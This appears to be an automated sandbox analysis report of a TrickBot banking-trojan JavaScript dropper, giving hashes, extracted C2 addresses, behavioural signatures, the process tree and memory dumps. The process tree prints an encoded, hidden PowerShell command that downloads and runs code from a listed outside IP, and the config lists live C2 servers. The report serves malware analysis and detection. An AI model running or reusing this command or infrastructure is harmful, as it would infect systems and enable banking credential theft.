trickbot | 185ac740c3516c3a6461b15d9b94047d6b48c0bd2184a03087890b573ace2884

General

Target

4524.js
Size

344KB
MD5

1e15caad81dbf43c24c3517c6658c138
SHA1

5a0e8e9cdc2a8b5a575c8f55674fa675ff49eef2
SHA256

185ac740c3516c3a6461b15d9b94047d6b48c0bd2184a03087890b573ace2884
SHA512

dd094e3e20987d6951da8e7069bff408b09293a6c67077a77d6721b801754a2cf4bee895b67bac4a65d0a0f49a57be180b059f4334d9ecd825497c6d07da00fd

Score

10^/10

trickbot rob109 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://109.248.201.26/lovemetertok.php

Extracted

Family

trickbot

Version

100018

Botnet

rob109

C2

38.110.103.124:443

185.56.76.28:443

204.138.26.60:443

60.51.47.65:443

74.85.157.139:443

68.69.26.182:443

38.110.103.136:443

38.110.103.18:443

138.34.28.219:443

185.56.76.94:443

217.115.240.248:443

24.162.214.166:443

80.15.2.105:443

154.58.23.192:443

38.110.100.104:443

45.36.99.184:443

185.56.76.108:443

185.56.76.72:443

138.34.28.35:443

97.83.40.67:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

6 336 powershell.exe
7 336 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

616 rundll32.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

336 powershell.exe
336 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewermgr.exe

description pid process

Token: SeDebugPrivilege 336 powershell.exe
Token: SeDebugPrivilege 1168 wermgr.exe

flow	pid	process
6	336	powershell.exe
7	336	powershell.exe

pid	process
616	rundll32.exe

flow	ioc
12	api.ipify.org

pid	process
336	powershell.exe
336	powershell.exe

description	pid	process
Token: SeDebugPrivilege	336	powershell.exe
Token: SeDebugPrivilege	1168	wermgr.exe

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

wscript.execmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1240 wrote to memory of 1520	1240	wscript.exe	cmd.exe
PID 1240 wrote to memory of 1520	1240	wscript.exe	cmd.exe
PID 1240 wrote to memory of 1520	1240	wscript.exe	cmd.exe
PID 1520 wrote to memory of 336	1520	cmd.exe	powershell.exe
PID 1520 wrote to memory of 336	1520	cmd.exe	powershell.exe
PID 1520 wrote to memory of 336	1520	cmd.exe	powershell.exe
PID 336 wrote to memory of 588	336	powershell.exe	rundll32.exe
PID 336 wrote to memory of 588	336	powershell.exe	rundll32.exe
PID 336 wrote to memory of 588	336	powershell.exe	rundll32.exe
PID 588 wrote to memory of 616	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 616	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 616	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 616	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 616	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 616	588	rundll32.exe	rundll32.exe
PID 588 wrote to memory of 616	588	rundll32.exe	rundll32.exe
PID 616 wrote to memory of 304	616	rundll32.exe	cmd.exe
PID 616 wrote to memory of 304	616	rundll32.exe	cmd.exe
PID 616 wrote to memory of 304	616	rundll32.exe	cmd.exe
PID 616 wrote to memory of 304	616	rundll32.exe	cmd.exe
PID 616 wrote to memory of 1168	616	rundll32.exe	wermgr.exe
PID 616 wrote to memory of 1168	616	rundll32.exe	wermgr.exe
PID 616 wrote to memory of 1168	616	rundll32.exe	wermgr.exe
PID 616 wrote to memory of 1168	616	rundll32.exe	wermgr.exe
PID 616 wrote to memory of 1168	616	rundll32.exe	wermgr.exe
PID 616 wrote to memory of 1168	616	rundll32.exe	wermgr.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\4524.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:1520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:336

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\iSePCFQ.bin StartW
4⤵
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\iSePCFQ.bin StartW
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
6⤵
PID:304

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\iSePCFQ.bin
MD5
c081de0c60b825636e0eda6debce444e

SHA1
a52284367553b80721088831bf6d7c128b2138df

SHA256
401e52fb29e17537735f4a4a53058c091957379b9e0d79855936dfbb62d12dcd

SHA512
876726a135ce5c5fa7dd1faa152ff737b0225f5f7c0ed17c70cb1b96a68074c4912eb49849c39bd8e3ee28e66fe746ced0398c2295b26db1f486882caca01a65

Download Submit
\Users\Admin\AppData\Local\Temp\iSePCFQ.bin
MD5
c081de0c60b825636e0eda6debce444e

SHA1
a52284367553b80721088831bf6d7c128b2138df

SHA256
401e52fb29e17537735f4a4a53058c091957379b9e0d79855936dfbb62d12dcd

SHA512
876726a135ce5c5fa7dd1faa152ff737b0225f5f7c0ed17c70cb1b96a68074c4912eb49849c39bd8e3ee28e66fe746ced0398c2295b26db1f486882caca01a65

Download Submit
memory/336-60-0x0000000000000000-mapping.dmp

Download
memory/336-61-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

Filesize
8KB

Download
memory/336-62-0x0000000001F90000-0x0000000001F91000-memory.dmp

Filesize
4KB

Download
memory/336-63-0x000000001ADD0000-0x000000001ADD1000-memory.dmp

Filesize
4KB

Download
memory/336-64-0x0000000002060000-0x0000000002061000-memory.dmp

Filesize
4KB

Download
memory/336-65-0x000000001AD50000-0x000000001AD52000-memory.dmp

Filesize
8KB

Download
memory/336-66-0x000000001AD54000-0x000000001AD56000-memory.dmp

Filesize
8KB

Download
memory/336-67-0x0000000002090000-0x0000000002091000-memory.dmp

Filesize
4KB

Download
memory/336-68-0x000000001B890000-0x000000001B891000-memory.dmp

Filesize
4KB

Download
memory/588-69-0x0000000000000000-mapping.dmp

Download
memory/616-71-0x0000000000000000-mapping.dmp

Download
memory/616-72-0x00000000752B1000-0x00000000752B3000-memory.dmp

Filesize
8KB

Download
memory/616-74-0x0000000000310000-0x000000000034B000-memory.dmp

Filesize
236KB

Download
memory/616-77-0x0000000000350000-0x0000000000389000-memory.dmp

Filesize
228KB

Download
memory/616-79-0x00000000003A0000-0x00000000003D7000-memory.dmp

Filesize
220KB

Download
memory/616-82-0x0000000000500000-0x0000000000544000-memory.dmp

Filesize
272KB

Download
memory/616-81-0x0000000000140000-0x0000000000178000-memory.dmp

Filesize
224KB

Download
memory/616-83-0x00000000006B0000-0x00000000006C1000-memory.dmp

Filesize
68KB

Download
memory/616-84-0x00000000001F1000-0x00000000001F3000-memory.dmp

Filesize
8KB

Download
memory/1168-85-0x0000000000000000-mapping.dmp

Download
memory/1168-86-0x00000000000E0000-0x0000000000108000-memory.dmp

Filesize
160KB

Download
memory/1168-87-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1520-59-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads